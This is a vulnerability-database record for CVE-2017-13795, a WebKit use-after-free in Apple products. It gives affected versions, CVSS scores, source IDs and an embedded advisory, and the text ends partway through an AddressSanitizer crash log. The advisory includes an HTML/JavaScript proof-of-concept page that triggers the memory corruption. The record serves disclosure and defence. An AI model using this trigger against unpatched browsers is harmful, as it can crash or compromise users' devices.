"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-0447",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "itunes",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.7.1"
},
{
"model": "icloud",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "7.1"
},
{
"model": "webkit",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": null
},
{
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.1"
},
{
"model": "safari",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.0.1"
},
{
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.1"
},
{
"model": "icloud",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "7.1 (windows 7 or later )"
},
{
"model": "ios",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.1 (ipad air or later )"
},
{
"model": "ios",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.1 (iphone 5s or later )"
},
{
"model": "ios",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.1 (ipod touch first 6 generation )"
},
{
"model": "itunes",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "for windows 12.7.1 (windows 7 or later )"
},
{
"model": "safari",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.0.1 (macos high sierra 10.13)"
},
{
"model": "safari",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.0.1 (macos sierra 10.12.6)"
},
{
"model": "safari",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.0.1 (os x el capitan 10.11.6)"
},
{
"model": "tvos",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.1 (apple tv 4k)"
},
{
"model": "tvos",
"scope": "lt",
"trust": 0.8,
"vendor": "apple",
"version": "11.1 (apple tv first 4 generation )"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "4.6.0"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "6.0.5"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "4.6"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "9.0.1"
},
{
"model": "itunes",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "4.7"
},
{
"model": "iphone os",
"scope": "eq",
"trust": 0.6,
"vendor": "apple",
"version": "3.1"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:apple:icloud",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:iphone_os",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:itunes",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:apple:safari",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:apple_tv",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apple",
"sources": [
{
"db": "PACKETSTORM",
"id": "144861"
},
{
"db": "PACKETSTORM",
"id": "144828"
},
{
"db": "PACKETSTORM",
"id": "144830"
},
{
"db": "PACKETSTORM",
"id": "144831"
}
],
"trust": 0.4
},
"cve": "CVE-2017-13795",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-13795",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-104453",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-13795",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-13795",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-13795",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-094",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-104453",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2017-13795",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-104453"
},
{
"db": "VULMON",
"id": "CVE-2017-13795"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-010339"
},
{
"db": "NVD",
"id": "CVE-2017-13795"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in certain Apple products. iOS before 11.1 is affected. Safari before 11.0.1 is affected. iCloud before 7.1 on Windows is affected. iTunes before 12.7.1 on Windows is affected. tvOS before 11.1 is affected. The issue involves the \"WebKit\" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. WebKit: use-after-free in WebCore::AXObjectCache::performDeferredCacheUpdate \n\nCVE-2017-13795\n\n\nThere is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. \n\nNote that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. \n\nPoC:\n\n=================================================================\n\n\u003cstyle\u003e\n#colgrp { display: table-footer-group; }\n.class1 { text-transform: capitalize; display: -webkit-box; }\n\u003c/style\u003e\n\u003cscript\u003e\nfunction go() {\n textarea.setSelectionRange(30,1);\n option.defaultSelected = true;\n col.setAttribute(\"aria-labeledby\", \"link\");\n}\n\u003c/script\u003e\n\u003cbody onload=go()\u003e\n\u003clink id=\"link\"\u003e\n\u003ctable\u003e\n\u003ccolgroup id=\"colgrp\"\u003e\n\u003ccol id=\"col\" tabindex=\"1\"\u003e\u003c/col\u003e\n\u003cthead class=\"class1\"\u003e\n\u003cth class=\"class1\"\u003e\n\u003ctextarea id=\"textarea\" readonly=\"readonly\"\u003e\u003c/textarea\u003e\n\u003coption id=\"option\"\u003e\u003c/option\u003e\n\n=================================================================\n\nASan log:\n\n=================================================================\n==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78\nREAD of size 8 at 0x603000346940 thread T0\n==30369==WARNING: invalid path to external symbolizer!\n==30369==WARNING: Failed to use and restart external symbolizer!\n #0 0x113012177 in WTF::ListHashSetConstIterator\u003cWebCore::Node*, WTF::PtrHash\u003cWebCore::Node*\u003e \u003e::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177)\n #1 0x112ff326d in WTF::ListHashSetIterator\u003cWebCore::Node*, WTF::PtrHash\u003cWebCore::Node*\u003e \u003e::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d)\n #2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2)\n #3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242)\n #4 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74)\n #5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)\n #6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)\n #7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)\n #8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)\n #9 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)\n #10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\n #11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\n #12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\n #13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)\n #14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)\n #15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)\n #16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)\n #17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\n #18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\n #19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\n #20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\n\n0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948)\nfreed by thread T0 here:\n #0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\n #1 0x11ffee650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650)\n #2 0x11300fccb in WTF::ListHashSet\u003cWebCore::Node*, WTF::PtrHash\u003cWebCore::Node*\u003e \u003e::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb)\n #3 0x113007edd in WTF::ListHashSet\u003cWebCore::Node*, WTF::PtrHash\u003cWebCore::Node*\u003e \u003e::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd)\n #4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30)\n #5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a)\n #6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10)\n #7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542)\n #8 0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1)\n #9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc)\n #10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector\u003cWebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul\u003e\u0026) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63)\n #11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce)\n #12 0x112e40a59 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59)\n #13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec)\n #14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53)\n #15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb)\n #16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1)\n #17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f)\n #18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd)\n #19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea)\n #20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242)\n #21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74)\n #22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)\n #23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)\n #24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)\n #25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)\n #26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)\n #27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\n #28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\n #29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\n\npreviously allocated by thread T0 here:\n #0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\n #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\n #2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4)\n #3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d)\n #4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247)\n #5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a)\n #6 0x113011c38 in WTF::ListHashSetNode\u003cWebCore::Node*\u003e::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38)\n #7 0x113020d79 in void WTF::ListHashSetTranslator\u003cWTF::PtrHash\u003cWebCore::Node*\u003e \u003e::translate\u003cWTF::ListHashSetNode\u003cWebCore::Node*\u003e, WebCore::Node* const\u0026, std::nullptr_t\u003e(WTF::ListHashSetNode\u003cWebCore::Node*\u003e*\u0026, WebCore::Node* const\u0026\u0026\u0026, std::nullptr_t\u0026\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79)\n #8 0x112ffbec9 in WTF::ListHashSet\u003cWebCore::Node*, WTF::PtrHash\u003cWebCore::Node*\u003e \u003e::add(WebCore::Node* const\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9)\n #9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785)\n #10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const\u0026, WTF::AtomicString const\u0026, WTF::AtomicString const\u0026, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e)\n #11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const\u0026, WTF::AtomicString const\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d)\n #12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const\u0026, WTF::AtomicString const\u0026, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1)\n #13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const\u0026, WTF::AtomicString const\u0026, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12)\n #14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const\u0026, WTF::AtomicString const\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b)\n #15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31)\n #16 0x1144392e8 in long long WebCore::IDLOperation\u003cWebCore::JSElement\u003e::call\u003c\u0026(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope\u0026)), (WebCore::CastedThisErrorBehavior)0\u003e(JSC::ExecState\u0026, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8)\n #17 0x3c5768201027 (\u003cunknown module\u003e)\n #18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)\n #19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)\n #20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f)\n #21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847)\n #22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const\u0026, JSC::JSValue, JSC::ArgList const\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a)\n #23 0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const\u0026, JSC::JSValue, JSC::ArgList const\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731)\n #24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const\u0026, JSC::JSValue, JSC::ArgList const\u0026, WTF::NakedPtr\u003cJSC::Exception\u003e\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2)\n #25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const\u0026, JSC::JSValue, JSC::ArgList const\u0026, WTF::NakedPtr\u003cJSC::Exception\u003e\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13)\n #26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const\u0026, JSC::JSValue, JSC::ArgList const\u0026, WTF::NakedPtr\u003cJSC::Exception\u003e\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615)\n #27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext\u0026, WebCore::Event\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd)\n #28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event\u0026, WTF::Vector\u003cWTF::RefPtr\u003cWebCore::RegisteredEventListener\u003e, 1ul, WTF::CrashOnOverflow, 16ul\u003e) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010)\n #29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event\u0026) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0)\n\nSUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator\u003cWebCore::Node*, WTF::PtrHash\u003cWebCore::Node*\u003e \u003e::operator++()\nShadow bytes around the buggy address:\n 0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd\n 0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa\n 0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa\n 0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd\n 0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa\n=\u003e0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02\n 0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd 